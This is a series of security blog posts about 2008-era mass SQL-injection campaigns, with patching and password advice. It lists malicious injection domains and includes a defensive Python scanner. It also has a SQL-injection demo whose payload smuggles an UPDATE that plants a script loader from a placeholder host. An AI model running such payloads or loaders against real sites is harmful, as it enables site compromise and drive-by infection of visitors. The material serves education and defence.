Hacking


Read this story on usatoday.com; it backs up why the bad guys can take advantage of millions of web surfers out there.  Click here for the usatoday story.  I guess I should not complain, because this reinforces why I feel I have job security.  Anyway, here are the scary stats.  If you get one thing out of this posting, please use a patched browser.  Patching is one of the simplest things to do, but so many people don’t do it for one reason or another.

Here is an excerpt from a story linked from the usatoday.com article.  It is from the website securitywatch.eweek.com:

While many of us will spend the better part of our adult lives sitting at computers, and more specifically keeping our eyes trained on the cyber-crime ecosystem, can we really expect people who do not to constantly remember to go download new software releases?

According to the researchers, “at most 83.3 percent of Firefox users, 65.3 percent of Safari users, 56.1 percent of Opera users and 47.6 percent of Internet Explorer users were using the latest, most secure browser version on any day between January 2007 [and] June 2008.”

The Firefox number is actually quite surprising. The idea that less than 50 percent of the estimated 577 million people using IE are not on current versions really is not. Firefox users tend to be more technically savvy, as many have specifically sought out the browser for themselves. Most of the people using IE have it installed on their machines by default.

Based on this information, it’s no wonder the criminal attacker is so successful.  I’m thinking about downloading Opera and testing it as another, more secure browser.  I use Firefox along with add-ons to improve my security.  There is no way to be 100% secure.  There will always be zero-day attacks that no patching can help with.  Quick response to vulnerabilities is the reason I use the Ubuntu operating system.

That is it for this post.  Lots of fireworks going off tonight, so the high price of gas hasn’t slowed too many folks from buying fireworks.  Sure has affected me and my 4th of July spending habits.  Have a great Thursday and stay safe.

Shadowserver.org does great work and informs the security community about the darker side of the Internet. In their most recent posting, they list the domains that are serving up the malicious content in these injections. Here is the list, with the number of pages found injected with a reference to each malicious domain.  Please be advised: DO NOT VISIT ANY OF THESE SITES.

www.nihaorr1.com 468,000
free.hostpinoy.info 444,000
xprmn4u.info 369,000
www.nmidahena.com 140,000
winzipices.cn 75,000
sb.5252.ws 69,000
www.aspder.com 62,000
www.11910.net 47,000
bbs.jueduizuan.com 44,000
www.bluell.cn 44,000
www.2117966.net 39,000
s.see9.us 39,000
xvgaoke.cn 33,000
1.hao929.cn 20,000
www.414151.com 17,000
cc.18dd.net 15,000
yl18.net 15,000
www.kisswow.com.cn 13,000
urkb.net 13,000
c.uc8010.com 9500
rnmb.net 7000
www.ririwow.cn 6000
www.killwow1.cn 4000
www.qiqigm.com 3600
www.wowgm1.cn 3500
www.wowyeye.cn 2800
9i5t.cn 2500
c11.8866.org 2500
computershello.cn 2300
www.z008.net 1600
b15.3322.org 1200
www.direct84.com 1100
www.caocaowow.cn 900
www.qiuxuegm.com 800
firestnamestea.cn 700
%61%2E%6B%61%34%37%2E%75%73 (a.ka47.us) 600
%61%31%38%38%2E%77%73 (a188.ws) 500
n.uc8010.com 250
www.qiqi111.cn 230
heartgames.cn 220
www.adw95.com 170
www.banner82.com 90
smeisp.cn 85
okey123.cn 55
b.kaobt.cn 50
www.nihao112.com 45
al.99.vc 45
www.aidushu.net 45
a.13175.com 40
www.chliyi.com 40
free.edivid.info 40
52-o.cn 40
www.fucksb.net 40
www60.actualization.cn 40
d39.6600.org 40
h28.8800.org 34
001yl.com 30
ucmal.com 30
t.uc8010.com 30
www.dota11.cn 25
m11.3322.org 20
bc0.cn 20
%33%2E%74%72%6F%6A%61%6E%38%2E%63%6F%6D (3.trojan8.com) 20
www.adword71.com 17
killpp.cn 16
w11.6600.org 13
usuc.us 13
www.msshamof.com 10
newasp.com.cn 7
www.wowgm2.cn 8
mm.jsjwh.com.cn 8
17ge.cn 4
www.adword72.com 2
www.117275.cn 1
vb008.cn ?
www.wow112.cn ?
www.nihaoel3.com ?
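The practical use of a list like the one above is to scan your own pages for a script tag pointing at one of these hosts. The Python below is an added example, not code from Shadowserver or from this blog: it reads a blocklist in the same "host count" format, decodes the %-encoded entries the list carries, and then checks a page for external script sources (plain or %-encoded) and for a URL hidden inside an unescape("...") string in an inline script. The blocklist excerpt is copied from the list above; the sample HTML and the script paths (/1.js, /x.js) are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed excerpt, in the same "host count" format as the list above.
# Hosts and counts are copied from the list; "?" means no count was given.
BLOCKLIST_TEXT = """
www.nihaorr1.com 468,000
free.hostpinoy.info 444,000
winzipices.cn 75,000
%61%2E%6B%61%34%37%2E%75%73 (a.ka47.us) 600
vb008.cn ?
"""

def normalize_host(host):
    """Undo %-encoding (some list entries and some injected tags use it),
    lowercase, and drop any port or trailing dot so lookups compare equal."""
    return unquote(host or "").strip().lower().split(":")[0].rstrip(".")

def parse_blocklist(text):
    """Map normalized host -> page count (None where the list shows '?')."""
    hosts = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        count = parts[-1].replace(",", "")
        hosts[normalize_host(parts[0])] = int(count) if count.isdigit() else None
    return hosts

class ScriptCollector(HTMLParser):
    """Collects the src of every external <script> and the text of inline ones."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

# Hosts of http(s) URLs, matched against inline script text after decoding.
URL_RE = re.compile(r"https?://([^/'\"\s<>]+)", re.I)

def find_injected(html, blocklist):
    """Return [(host, 'src'|'inline'), ...] for scripts that reference a
    blocklisted host, whether via a plain src, a %-encoded src, or a URL
    hidden inside an unescape("...") string in an inline script."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for src in collector.srcs:
        host = normalize_host(urlsplit(src).hostname)
        if host in blocklist and (host, "src") not in hits:
            hits.append((host, "src"))
    decoded = unquote("".join(collector.inline))
    for host in URL_RE.findall(decoded):
        host = normalize_host(host)
        if host in blocklist and (host, "inline") not in hits:
            hits.append((host, "inline"))
    return hits

# Constructed page: one legitimate menu script plus three injected loaders.
SAMPLE_HTML = """<html><head><title>Community news</title>
<script src="/js/menu.js"></script>
<script src="http://www.nihaorr1.com/1.js"></script>
</head><body><p>Welcome to our site.</p>
<script src="http://%61%2E%6B%61%34%37%2E%75%73/x.js"></script>
<script>document.write(unescape("%3Cscript src=%22http://winzipices.cn/1.js%22%3E%3C/script%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    blocklist = parse_blocklist(BLOCKLIST_TEXT)
    for host, where in find_injected(SAMPLE_HTML, blocklist):
        print(f"{host:<20} via {where:<6} (listed count: {blocklist[host]})")
```

Run it over your own saved pages (or a crawl of your site) rather than the live malicious hosts; the scanner never fetches anything from the blocklisted domains, it only looks for references to them.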

I work in computer security, and we see a lot of attacks from some bad people.  What trends are we seeing, and what will attacks look like in the near future?  Here are my thoughts.  I read a lot of tech sites and listen to tech podcasts, and you hear a lot of opinions.  The biggest trend this year will be legitimate sites being hacked and malicious code injected into them, so that they serve up attacks on unknowing visitors.

We started seeing this trend in early 2007 with the Super Bowl site for Dolphin Stadium.  Then it got quiet until the end of the year, and since then things have picked up.  They are going to get worse.  Malicious toolkits can be bought on the Internet, and the exploits they deliver can be swapped out as new vulnerabilities are found and old ones are patched.  This attack vector is very efficient: a single injection campaign can affect hundreds of thousands of pages in a short period of time.

What is coming in the not-so-distant future in computer security?  I believe those who say that hardware other than the PC itself will be targeted soon.  Think of home routers controlled by attackers, who use a form of DNS poisoning to send you to their fake paypal.com.  Short of the browser’s certificate warning on the HTTPS login page, you won’t be able to tell you aren’t on the real paypal.com site.  These devices need to be secured and receive security updates too.  Let me ask you a question about the router you use at home.  When was the last time you logged into that wireless router and updated the firmware?  Never?  I’m sure there have been updates.  Learn how to maintain all the devices you have.

I feel pretty secure surfing the web, but I take steps to avoid going to risky places and I use as many tools as I can to defend against the criminal attackers out on the Internet.  Patch.  It’s simple and a huge step in the right direction.  I read a lot, and I try to share it with you.  The common man or woman does not keep up with all the threats out there.  The one resource I would start reading is the Internet Storm Center.  They are a sort of warehouse of information about threats on the net and what you can do to protect yourself.

That is it for now.  The weekend is getting so close I can taste it.  Stay safe and have a happy Thursday.

Most of the time, attacks from the Internet are silent.  You may not realize that clicking on your favorite web site silently redirected you to a server in China, which then ran exploits against Microsoft’s Internet Explorer, Firefox, QuickTime, RealPlayer, and other applications on your PC.  If you haven’t patched all your software, some attacker might just be able to take control of your machine and execute code remotely.  Those are words you really don’t want to hear.

Eventually, your anti-virus vendor gets signatures for the bad software loaded on your machine and can clean it off.  But how did it get there?  What do I use my PC for?  Do I bank online?  Do I access my investment accounts online?  Do I store personal information about myself or my family in a document saved on the PC’s hard drive?  If so, you need to take steps to figure out just what happened, and assume that anything you typed or stored while the malware was running may have been read.

First of all, is your software patched?  If not, download the patches from Microsoft, Apple, the makers of RealPlayer, or whoever makes the application, and apply them.  Set up a routine so your PC is scanned regularly and you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow the stories posted online.  If it is a big-name site like CNN.com or USAToday.com, you might hear about it.  Hundreds of thousands of smaller sites get hacked and you never know.  You can defend against many of these attacks by using the NoScript add-on with your Firefox browser, which blocks JavaScript from domains you haven’t approved.

Do you let the browser store passwords for sites, so they are filled in when you browse to them?  Are any of those sites holding a credit card of yours?  If you’ve read my blog much, you know I advise you not to use the function that remembers passwords to sites.

One thing you have to remember: the Internet was not set up to handle secure transactions.  It was set up to share information.  Bad guys are taking advantage of all the vulnerabilities out there.  I cannot guarantee you will be completely safe even if you follow all these steps, but you can follow best practices and be safer than the average person.  If you have teenagers, your battle will be an uphill fight.  Teenagers trust everyone and click things that need not be clicked.  Think about having one computer the adults use and another the teenagers use.  You’ll still have to fight off attacks on the teenagers’ PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right: yet another new code injection attack. Just prior to writing this post, the search showed 855,000 pages infected with malicious (BAD!!) code injected into legitimate sites. NoScript is one defense, since the injected script is hosted on a domain other than the site you are visiting, and NoScript blocks scripts from domains you haven’t allowed.

The attack I wrote about last week just hasn’t really taken off. A Google search shows 25,500 pages affected by that one. It is early in the game for both attacks, so more details will come out later. I’ll do more checking on the current attacks to see where the bad sites are being hosted.

The two script sources in this new attack are listed below.  I’ve altered the URLs (hxxp in place of http).  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js

Stay safe and HAPPY MOTHER’S DAY!!!

Well, it doesn’t appear that this attack is spreading. I just did a Google search on one of the redirect domains and it showed only 14,000 pages. Not as efficient as the last one, which blasted several hundred thousand pages. I still see some of the same names on this list; it seems to be the smaller organizations, which probably don’t have full-time staff to work on their sites and may not even know they have been compromised. Here is a short list of a few of the domains still making an appearance in Google. Remember that they may have been cleaned since and Google’s spiders haven’t caught up yet.

hxxp://www.wiredseniors.com

hxxp://www.moviesunlimited.com

hxxp://www.seniorstravelguide.com

hxxp://www.cancerissues.com

hxxp://www.reducecholesterol.org

hxxp://www.coloradowheelchairsports.org

hxxp://www.peta.org    (All you PETA freaks can still go there though.  Happy Surfing.  All my friends stay clear)

hxxp://www.seniorshomeexchange.com

hxxp://www.adhdissues.com

hxxp://www.goodtime-tickets.com

hxxp://www.matcmadison.edu

hxxp://www.coolbuddy.com

I’ll give an update on this if things pick up.  If you want to see the number of sites infected, Google winzipices.cn and you’ll get a pretty long list.  Stay away unless you want your PC compromised.  Stay safe and take care.

I don’t have a lot of information at this time, other than that there appears to be another SQL injection attack similar to the ones we’ve seen, where legitimate sites are made to redirect visitors to sites in China that then launch various exploits that can compromise a machine. It may take a few days, but more details about this attack will come out; right now there isn’t a lot out there. If you want to read more, you can go to the Internet Storm Center page by clicking here and read what they know.

As more information becomes available, I’ll post another story. Take care and have a safe week!

Stories came out last week that the folks in Redmond had a closed-door meeting with law enforcement. Here is an excerpt about this story.

Botnet fighters have another tool in their arsenal, thanks to the folks at Microsoft. The software vendor is giving law enforcers access to a special tool that keeps tabs on botnets, using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool that ships with Windows. Microsoft is reluctant to give out details on its botnet buster; the company said that even revealing its name could give cyber criminals a clue on how to thwart it.

Microsoft company executives discussed it at a closed door conference held for law enforcement professionals Monday. The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft’s users, said Tim Cranton, associate general counsel with Microsoft’s World Wide Internet Safety Programs. “I think of it … as botnet intelligence,” he said.

Kind of cool, I thought. But it makes one wonder how much information Microsoft is keeping on its customers, who make up the majority of the folks online.

Stay safe and have a great week!!

Well, this past week saw another large-scale hacking of legitimate sites, including some belonging to the UN, the UK government, .edu sites, and many travel sites, to name just a few.  The hack injected a redirect that sent visitors of the compromised sites to servers in China, which ran 8 exploits, including MS07-004 for IE.  This has become a common pattern: compromise a trusted site, then use it to direct visitors to the criminal attacker’s own bad websites.  The two sites it pointed to were IPs belonging to China.  Surprise!

Just do a Google search on these domains and you will see how widespread the problem is.  Search on them, but don’t go to any of these sites: nihaorr1.com and haoliuliang.net.

The lessons learned here are these.  No longer can we say there is such a thing as a trusted site.  I use the Firefox browser with an add-on called “NoScript”.  Check it out.  It lets you control which JavaScript runs and which doesn’t.  And of course patching is VERY important.  Patch your Microsoft software, your Firefox browser, QuickTime, iTunes, RealPlayer, WinZip, Adobe Reader, Adobe Flash, and any other software that you use.  Here are the facts: thanks to crappy programming (in this case, web applications that paste visitor input straight into their SQL queries), the computer security field is going strong.  That is the core problem.  There are no easy answers here, but you can do the things mentioned above.
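To make the “crappy programming” concrete, here is an added example (not code from this blog or from any of the compromised sites) of the bug behind this attack and behind the “legitimate sites being hacked” and “another SQL injection attack” posts above. SQLite stands in for the SQL Server back ends the real campaigns hit, and run_stacked emulates a database driver that accepts several semicolon-separated statements in one call, which is what let a single tampered URL parameter append a script tag to stored page content. The 2008 campaigns walked every text column of every table with a T-SQL cursor; this example updates one column to keep it short. The table, the rows, and the script host malicious.example are constructed for the example and are not one of the domains listed on this page.

```python
import sqlite3

# Constructed loader tag; malicious.example is a placeholder host.
INJECTED = '<script src="http://malicious.example/f.js"></script>'

def make_db():
    """A tiny CMS table of the kind the mass injections rewrote."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)",
                     [("Home", "<p>Welcome</p>"), ("Tickets", "<p>Buy tickets here</p>")])
    conn.commit()
    return conn

def run_stacked(conn, sql):
    """Emulate a driver that runs several ';'-separated statements in one
    call, as classic ASP with SQL Server did. sqlite3's execute() refuses
    stacked statements, hence the split. Returns rows of the last statement."""
    rows = []
    for stmt in (s.strip() for s in sql.split(";")):
        if stmt:
            rows = conn.execute(stmt).fetchall()
    conn.commit()
    return rows

def vulnerable_lookup(conn, page_id):
    """The bug: the query-string value is pasted into the SQL text."""
    return run_stacked(conn, "SELECT title, body FROM pages WHERE id = " + page_id)

def safe_lookup(conn, page_id):
    """The fix: the value travels as a bound parameter, never as SQL text,
    so a payload can only ever be compared against id, not executed."""
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (page_id,)).fetchall()

def mass_injection_payload():
    """What the attacker sends in place of a page id: a valid id, then a
    second statement that appends the loader to every row's body."""
    return "1; UPDATE pages SET body = body || '" + INJECTED + "'"

def infected_rows(conn):
    """How many stored pages now carry a script tag."""
    return conn.execute("SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    print("infected before:", infected_rows(db))
    vulnerable_lookup(db, mass_injection_payload())
    print("infected after vulnerable lookup:", infected_rows(db))
    clean = make_db()
    print("safe lookup with payload returns:", safe_lookup(clean, mass_injection_payload()))
    print("infected after safe lookup:", infected_rows(clean))
```

Note that the site never has to serve the attacker’s page directly: once the loader tag sits in the database, every visitor to every page pulls the script from the attacker’s host, which is exactly why NoScript’s blocking of unapproved third-party domains helps on the client side and why parameterized queries are the fix on the server side.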

Stay safe out there and I’ll be posting another story later this weekend.  I’ve been busy and haven’t had too much time.  We have been tracking this particular story where I work and I wanted to pass this along to you also.  Rock Chalk Jayhawk GO KU!!!  And remember, North Carolina Tarheel fans don’t have to listen to any of my advice.

A common question I ask when giving presentations on computer security is how many people have changed the password on their personal e-mail account in the past year.  In the corporate world, you can control how often a user has to change their password at work.  Most of the answers I get back about personal e-mail passwords are that they never have, or maybe did once a couple of years ago.

Now let’s think about an attacker who compromises your home PC.  He has a keylogger (a program that records a user’s keystrokes and sends them back to the attacker’s server) and has recorded you typing the password to your personal e-mail account.  OK, now let’s think.  Say you bank at a large national bank, you have a PayPal account, you have an eBay account, and many other common online accounts that a criminal attacker could take over for his nefarious activities.  Do you use the same user name and password for those as for your personal e-mail account?  Remember that the e-mail account is the master key anyway: the password-reset links for the other accounts land there.  Am I making you think about changing your password and using different user names and passwords for your other accounts?  Hopefully so.

The lesson learned here is to change your password and not share user names and passwords between your e-mail and the financial accounts you have.  Use a strong password by mixing upper case, lower case, numbers, and special characters.  Use a password that is actually longer than 8 characters.  Something like a passphrase will be easier for you to remember.

Hope everyone’s weekend is going great and stay safe out there.
